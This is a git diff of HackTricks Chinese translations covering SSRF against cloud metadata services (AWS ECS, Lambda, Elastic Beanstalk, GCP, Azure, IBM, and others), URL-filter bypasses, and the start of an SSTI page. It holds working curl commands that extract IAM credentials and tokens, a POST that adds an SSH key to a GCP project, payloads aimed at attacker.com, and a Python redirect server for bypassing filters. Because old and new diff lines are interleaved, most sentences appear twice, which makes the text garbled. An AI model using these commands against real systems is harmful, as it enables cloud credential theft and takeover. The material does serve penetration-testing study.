您可以利用**路径遍历**到`file:///proc/self/environ`来读取它\
上述的http地址应该提供给您**AccessKey、SecretKey和token**。
**ECS** 是一组逻辑上的 EC2 实例,您可以在其上运行应用程序,而无需扩展自己的集群管理基础设施,因为 ECS 为您管理这一切。如果您成功地攻陷在 **ECS** 中运行的服务,**元数据端点会发生变化**。
如果您访问 _**http://169.254.170.2/v2/credentials/\<GUID>**_,您将找到 ECS 机器的凭据。但首先,您需要 **找到 \<GUID>**。要找到 \<GUID>,您需要读取机器内部的 **environ** 变量 **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI**。\
您可以通过利用 **路径遍历** 来读取它,路径为 `file:///proc/self/environ`。\
提到的 http 地址应该会给您 **AccessKey、SecretKey 和 token**
```bash
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
```
{% hint style="info" %}
请注意,在**某些情况下**,您可以从容器中访问**EC2元数据实例**请检查之前提到的IMDSv2 TTL限制。在这些情况下您可以从容器中访问容器IAM角色和EC2 IAM角色。
注意,在**某些情况下**,您将能够从容器访问**EC2元数据实例**请检查之前提到的IMDSv2 TTL限制。在这些场景中您可以从容器访问容器IAM角色和EC2 IAM角色。
{% endhint %}
#### 用于AWS Lambda的SSRF <a href="#id-6f97" id="id-6f97"></a>
### AWS Lambda的SSRF <a href="#id-6f97" id="id-6f97"></a>
在这种情况下,**凭据存储在环境变量**。因此,要访问它们,您需要访问类似于\*\*`file:///proc/self/environ`\*\*的内容。
在这种情况下,**凭据存储在环境变量**。因此,要访问它们,您需要访问类似**`file:///proc/self/environ`**的内容。
**有趣的环境变量的名称**包括
**有趣的环境变量**的**名称**是
* `AWS_SESSION_TOKEN`
* `AWS_SECRET_ACCESS_KEY`
* `AWS_ACCES_KEY_ID`
此外除了IAM凭据Lambda函数还具有在启动函数时传递给函数的**事件数据**。此数据通过[运行时接口](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html)提供给函数,并且可能包含**敏感信息**(例如**stageVariables**中的信息。与IAM凭据不同此数据可通过标准SSRF在\*\*`http://localhost:9001/2018-06-01/runtime/invocation/next`\*\*访问。
此外除了IAM凭据Lambda函数在启动时还会有**传递给函数的事件数据**。这些数据通过[运行时接口](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html)提供给函数,并可能包含**敏感**的**信息**(例如在**stageVariables**中。与IAM凭据不同这些数据可以通过标准SSRF在**`http://localhost:9001/2018-06-01/runtime/invocation/next`**访问。
{% hint style="warning" %}
请注意,**Lambda凭据**位于**环境变量**中。因此如果Lambda代码的**堆栈跟踪**打印环境变量,可能会通过在应用程序中**引发错误**来**外泄**它们
注意,**lambda凭据**在**环境变量**中。因此,如果**lambda代码**的**堆栈跟踪**打印环境变量,则可能通过在应用中引发错误来**外泄它们**
{% endhint %}
#### 用于AWS Elastic Beanstalk的SSRF URL <a href="#id-6f97" id="id-6f97"></a>
### AWS Elastic Beanstalk的SSRF URL <a href="#id-6f97" id="id-6f97"></a>
我们从API中检索`accountId`和`region`。
```
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
我们随后从API中检索`AccessKeyId`、`SecretAccessKey`和`Token`。
我们然后从API中获取`AccessKeyId`、`SecretAccessKey`和`Token`。
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL)
然后我们使用这些凭据与 `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`
然后我们使用凭据执行 `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`
### GCP <a href="#id-6440" id="id-6440"></a>
## GCP <a href="#id-6440" id="id-6440"></a>
您可以在[**此处找到有关元数据端点的文档**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata)。
您可以[**在这里找到关于元数据端点的文档**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata)。
#### Google Cloud 的 SSRF URL <a href="#id-6440" id="id-6440"></a>
### Google Cloud 的 SSRF URL <a href="#id-6440" id="id-6440"></a>
需要 HTTP **`Metadata-Flavor: Google`**,您可以通过以下 URL 访问元数据端点:
需要 HTTP 头 **`Metadata-Flavor: Google`**,您可以通过以下 URL 访问元数据端点:
* http://169.254.169.254
* http://metadata.google.internal
* http://metadata
提取信息的有趣端点:
```bash
# /project
# Project name and number
@ -262,17 +250,13 @@ curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?rec
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
```
Beta目前不需要标题感谢Mathias Karlsson @avlidienbrunn
Beta 目前不需要头部(感谢 Mathias Karlsson @avlidienbrunn
```
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
{% hint style="danger" %}
为了**使用外泄的服务账户令牌**,你可以执行以下操作:
为了**使用被提取的服务账户令牌**,你可以这样做:
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
@ -286,16 +270,13 @@ gcloud config unset auth/access_token_file
```
{% endhint %}
#### 添加一个SSH密钥 <a href="#id-3e24" id="id-3e24"></a>
### 添加 SSH 密钥 <a href="#id-3e24" id="id-3e24"></a>
提取令牌
```
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
```
检查令牌的范围(使用先前的输出或运行以下内容)
检查令牌的范围(使用之前的输出或运行以下命令)
```bash
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
"issued_to": "101302079XXXXX",
@ -305,8 +286,7 @@ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXX
"access_type": "offline"
}
```
现在推送SSH密钥。
现在推送 SSH 密钥。
{% code overflow="wrap" %}
```bash
@ -317,10 +297,9 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
```
{% endcode %}
#### 云函数 <a href="#id-9f1f" id="id-9f1f"></a>
元数据端点的工作方式与虚拟机中的相同,但没有一些端点:
### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
元数据端点的工作方式与虚拟机相同,但没有某些端点:
```bash
# /project
# Project name and number
@ -345,15 +324,13 @@ echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/compu
echo " ============== "
done
```
### Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
{% hint style="warning" %}
Digital Ocean没有像AWS Roles或GCP service account这样的东西所以不要期望找到元数据机器凭证。
没有像 AWS 角色或 GCP 服务账户这样的东西,因此不要指望找到元数据机器人凭据
{% endhint %}
文档可在[`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)找到。
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
```
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
@ -365,16 +342,17 @@ http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
## Azure <a href="#cea8" id="cea8"></a>
### Azure <a href="#cea8" id="cea8"></a>
### Azure VM
#### Azure虚拟机
[**Docs** in here](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux).
[**文档** 在这里](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux)。
* **必须**包含头部 `Metadata: true`
* 不得包含 `X-Forwarded-For` 头部
* 必须 **不**包含 `X-Forwarded-For` 头部
{% tabs %}
{% tab title="Bash" %}
{% code overflow="wrap" %}
```bash
HEADER="Metadata:true"
@ -400,9 +378,9 @@ echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/"
```
{% endcode %}
{% endtab %}
{% tab title="PS" %}
```bash
# Powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
@ -415,18 +393,19 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h
/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
/metadata/instance/compute/userData?api-version=2021-01-01&format=text
```
{% endtab %}
{% endtabs %}
#### Azure App Service
### Azure App Service
**env** 中,您可以获取 `IDENTITY_HEADER``IDENTITY_ENDPOINT` 的值。您可以使用这些值来获取一个令牌,以便与元数据服务器通信。
**env** 中,您可以获取 `IDENTITY_HEADER` __ `IDENTITY_ENDPOINT` 的值。您可以使用这些值来获取与元数据服务器通信的令牌
大多数情况下,您希望获取以下资源之一的令牌:
大多数情况下,您需要为以下资源之一获取令牌:
* [https://storage.azure.com](https://storage.azure.com/)
* [https://vault.azure.net](https://vault.azure.net/)
* [https://graph.microsoft.com](https://graph.microsoft.com/)
* [https://management.azure.com](https://management.azure.com/)
```bash
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
@ -495,94 +474,113 @@ At line:1 char:1
+ FullyQualifiedErrorId :
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
```
### IBM 云 <a href="#id-2af0" id="id-2af0"></a>
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
{% hint style="warning" %}
请注意,在 IBM 中,默认情况下未启用元数据,因此即使您在 IBM 云虚拟机内部,也可能无法访问它。
请注意,在IBM中默认情况下元数据是未启用的因此即使您在IBM云VM内部也可能无法访问它
{% endhint %}
{% code overflow="wrap" %}
```
```bash
export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\
-H "Metadata-Flavor: ibm"\
-H "Accept: application/json"\
-d '{
"expires_in": 3600
}' | jq -r '(.access_token)'`
# Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
# Get SSH keys info
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
# Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
# Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq
# Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
```
{% endcode %}
\`\`\`bash export instance\_identity\_token=\`curl -s -X PUT "http://169.254.169.254/instance\_identity/v1/token?version=2022-03-01"\ -H "Metadata-Flavor: ibm"\ -H "Accept: application/json"\ -d '{ "expires\_in": 3600 }' | jq -r '(.access\_token)'\`
以下是各种平台元数据服务的文档,突出显示了可以访问实例的配置和运行时信息的方法。每个平台提供独特的端点来访问其元数据服务。
## Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance\_identity\_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
## Get SSH keys info
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance\_identity\_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
## Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance\_identity\_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
## Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance\_identity\_token" "http://169.254.169.254/metadata/v1/placement\_groups?version=2022-03-01" | jq
## Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance\_identity\_token" "http://169.254.169.254/instance\_identity/v1/iam\_token?version=2022-03-01" | jq
```
## Packetcloud
要访问Packetcloud的元数据请查看文档:[https://metadata.packet.net/userdata](https://metadata.packet.net/userdata)
要访问 Packetcloud 的元数据,可以在以下位置找到文档:[https://metadata.packet.net/userdata](https://metadata.packet.net/userdata)
## OpenStack/RackSpace
不需要头部信息。可以通过以下方式访问元数据:
这里没有提到需要头部。可以通过以下方式访问元数据:
- `http://169.254.169.254/openstack`
* `http://169.254.169.254/openstack`
## HP Helion
这里也没有提到需要头部信息。可以通过以下方式访问元数据
这里也没有提到需要头部。元数据可以在以下位置访问:
- `http://169.254.169.254/2009-04-04/meta-data/`
* `http://169.254.169.254/2009-04-04/meta-data/`
## Oracle Cloud
Oracle Cloud提供一系列端点来访问各种元数据方面:
Oracle Cloud 提供了一系列端点以访问各种元数据方面:
- `http://192.0.0.192/latest/`
- `http://192.0.0.192/latest/user-data/`
- `http://192.0.0.192/latest/meta-data/`
- `http://192.0.0.192/latest/attributes/`
* `http://192.0.0.192/latest/`
* `http://192.0.0.192/latest/user-data/`
* `http://192.0.0.192/latest/meta-data/`
* `http://192.0.0.192/latest/attributes/`
## Alibaba
阿里巴巴提供用于访问元数据的端点,包括实例和镜像ID
Alibaba 提供了访问元数据的端点,包括实例和镜像 ID
- `http://100.100.100.200/latest/meta-data/`
- `http://100.100.100.200/latest/meta-data/instance-id`
- `http://100.100.100.200/latest/meta-data/image-id`
* `http://100.100.100.200/latest/meta-data/`
* `http://100.100.100.200/latest/meta-data/instance-id`
* `http://100.100.100.200/latest/meta-data/image-id`
## Kubernetes ETCD
Kubernetes ETCD可以保存API密钥、内部IP地址和端口。访问方法如下:
Kubernetes ETCD 可以保存 API 密钥、内部 IP 地址和端口。访问示例如下:
- `curl -L http://127.0.0.1:2379/version`
- `curl http://127.0.0.1:2379/v2/keys/?recursive=true`
* `curl -L http://127.0.0.1:2379/version`
* `curl http://127.0.0.1:2379/v2/keys/?recursive=true`
## Docker
可以在本地访问Docker元数据示例显示了如何检索容器和镜像信息
Docker 元数据可以在本地访问,以下是获取容器和镜像信息的示例
- 通过Docker套接字访问容器和镜像元数据的简单示例:
- `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash`
- 在容器内使用带有Docker套接字的curl
- `curl --unix-socket /var/run/docker.sock http://foo/containers/json`
- `curl --unix-socket /var/run/docker.sock http://foo/images/json`
* 通过 Docker 套接字访问容器和镜像元数据的简单示例:
* `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash`
* 在容器内,使用 curl 和 Docker 套接字
* `curl --unix-socket /var/run/docker.sock http://foo/containers/json`
* `curl --unix-socket /var/run/docker.sock http://foo/images/json`
## Rancher
可以使用以下方式访问Rancher的元数据
可以使用以下方式访问 Rancher 的元数据:
- `curl http://rancher-metadata/<version>/<path>`
```
* `curl http://rancher-metadata/<version>/<path>`
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# URL格式绕过
{% hint style="success" %}
学习与实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我们在**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
**努力安全小组**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -93,9 +94,9 @@ spoofed.burpcollaborator.net = 127.0.0.1
```
![](<../../.gitbook/assets/image (776).png>)
**Burp扩展** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) 实现了IP格式绕过。
**Burp扩展** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) 实现了IP格式绕过。
### 域解析
### 域解析
```bash
https:attacker.com
https:/attacker.com
@ -159,9 +160,9 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
#Parameter pollution
next={domain}&next=attacker.com
```
### 路径和扩展绕过
### 路径和扩展绕过
如果要 URL 必须以路径或扩展结尾,或必须包含路径,您可以尝试以下绕过之一
如果您需要 URL 以路径或扩展结尾,或必须包含路径,您可以尝试以下绕过方法
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
@ -169,12 +170,12 @@ https://metadata/expected/path/..%2f..%2f/vulnerable/path
```
### Fuzzing
工具 [**recollapse**](https://github.com/0xacb/recollapse) 可以生成给定输入的变体,尝试绕过使用的正则表达式。查看 [**此文章**](https://0xacb.com/2022/11/21/recollapse/) 获取更多信息
工具 [**recollapse**](https://github.com/0xacb/recollapse) 可以从给定输入生成变体,以尝试绕过使用的正则表达式。有关更多信息,请查看 [**这篇文章**](https://0xacb.com/2022/11/21/recollapse/)。
### 通过重定向绕过
### Bypass via redirect
可能服务器正在**过滤 SSRF 的原始请求**,但**不过滤**对该请求的可能**重定向**响应。\
例如,一个通过 `url=https://www.google.com/` 可能存在 SSRF 漏洞的服务器可能正在**过滤 url 参数**。但如果您使用一个[python服务器响应 302](https://pastebin.com/raw/ywAUhFrv) 到您想要重定向的位置,您可能能够**访问被过滤的 IP 地址**,如 127.0.0.1,甚至被过滤的**协议**,如 gopher。\
服务器可能在**过滤原始请求**的 SSRF **但不**过滤对该请求的可能**重定向**响应。\
例如,一个通过 `url=https://www.google.com/` 漏洞的服务器可能在**过滤 url 参数**。但是,如果你使用 [python 服务器以 302 响应](https://pastebin.com/raw/ywAUhFrv) 到你想要重定向的地方,你可能能够**访问被过滤的 IP 地址**,如 127.0.0.1,甚至被过滤的**协议**,如 gopher。\
[查看此报告。](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
```python
#!/usr/bin/env python3
@ -200,7 +201,7 @@ HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
### 反斜杠技巧
_backslash-trick_ 利用了[WHATWG URL标准](https://url.spec.whatwg.org/#url-parsing)和[RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B)之间的差异。虽然RFC3986是URI的通用框架WHATWG专门用于web URL并被现代浏览器采用。关键区别在于WHATWG标准将反斜杠`\`)视为等同于正斜杠(`/`影响了URL的解析方式特别是标记从主机名到路径的转换
_反斜杠技巧_ 利用 [WHATWG URL 标准](https://url.spec.whatwg.org/#url-parsing) 和 [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B) 之间的差异。虽然 RFC3986 是 URI 的一般框架,但 WHATWG 特定于网络 URL并被现代浏览器采用。关键区别在于 WHATWG 标准将反斜杠 (`\`) 视为与正斜杠 (`/`) 等价,这影响了 URL 的解析,特别是标记了 URL 中主机名到路径的过渡
![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
@ -208,29 +209,30 @@ _backslash-trick_ 利用了[WHATWG URL标准](https://url.spec.whatwg.org/#url-p
![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)
图片来源:[https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
图片来自 [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
## 参考资料
## 参考文献
* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
**Try Hard Security Group**
**努力安全小组**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,61 +1,62 @@
# SSTI服务器端模板注入
# SSTI (Server Side Template Injection)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (641).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会
[**RootedCON**](https://www.rootedcon.com) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个学科的技术和网络安全专业人士的一个热烈交流点
{% embed url="https://www.rootedcon.com/" %}
## 什么是SSTI服务器端模板注入
## 什么是 SSTI (Server-Side Template Injection)
服务器端模板注入是一种漏洞,当攻击者可以将恶意代码注入到在服务器上执行的模板中时发生。这种漏洞可以在各种技术中找到,包括Jinja。
服务器端模板注入是一种漏洞,当攻击者能够将恶意代码注入到在服务器上执行的模板中时,就会发生这种漏洞。此漏洞可以在多种技术中找到,包括 Jinja。
Jinja是一种常用的用于Web应用程序的模板引擎。让我们看一个示例演示了使用Jinja的一个易受攻击的代码片段
Jinja 是一种在 web 应用程序中使用的流行模板引擎。让我们考虑一个使用 Jinja 的易受攻击代码片段的示例
```python
output = template.render(name=request.args.get('name'))
```
在这段易受攻击的代码中,用户请求中的 `name` 参数直接通过 `render` 函数传递到模板中。这可能允许攻击者`name` 参数中注入恶意代码,导致服务器端模板注入。
在这段脆弱的代码中,用户请求中的 `name` 参数直接通过 `render` 函数传递到模板中。这可能允许攻击者将恶意代码注入到 `name` 参数中,从而导致服务器端模板注入。
例如,攻击者可以构造一个包含如下载的请求:
例如,攻击者可以构造一个包含如下有效负载的请求:
```
http://vulnerable-website.com/?name={{bad-stuff-here}}
```
将`{{bad-stuff-here}}`负载注入到`name`参数中。此负载可以包含Jinja模板指令使攻击者能够执行未经授权的代码或操纵模板引擎潜在地控制服务器。
The payload `{{bad-stuff-here}}` 被注入到 `name` 参数中。这个有效载荷可以包含 Jinja 模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,从而可能控制服务器。
为防止服务器端模板注入漏洞,开发人员应确保用户输入在插入模板之前经过适当的清理和验证。实施输入验证并使用上下文感知的转义技术可以帮助减轻此漏洞的风险。
